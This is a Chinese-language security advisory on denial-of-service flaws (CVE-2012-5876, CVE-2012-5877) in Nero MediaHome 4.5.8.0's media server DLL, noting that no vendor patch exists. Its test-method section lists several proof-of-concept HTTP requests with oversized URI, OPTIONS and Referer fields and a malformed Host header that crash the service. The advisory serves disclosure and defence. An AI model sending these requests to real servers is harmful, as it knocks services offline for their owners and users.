Nero MediaHome 'NMMediaServer.dll'多个拒绝服务漏洞
Nero MediaHome 'NMMediaServer.dll'多个拒绝服务漏洞
发布日期:2013-01-09
更新日期:2013-01-13
受影响系统:
Nero MediaHome 4.5.8.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57253
CVE(CAN) ID: CVE-2012-5876,CVE-2012-5877
Nero MediaHome是Nero套件中的媒体服务器组件,允许在局域网中共享媒体文件。
Nero MediaHome 4.5.8.0及其他版本存在多个拒绝服务漏洞,成功利用后可造成应用崩溃。
<*来源:High-Tech Bridge Security Research Lab
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET /[A * 500000] HTTP/1.1
HOST: www.example.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
GET /[A * 500000] HTTP/1.1
HOST: www.example.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
OPTIONS / [A * 265712]
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.example1.com
GET / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]
GET / HTTP/1.1
: www.example.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example1.com
建议:
--------------------------------------------------------------------------------
厂商补丁:
Nero
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.nero.com
评论暂时关闭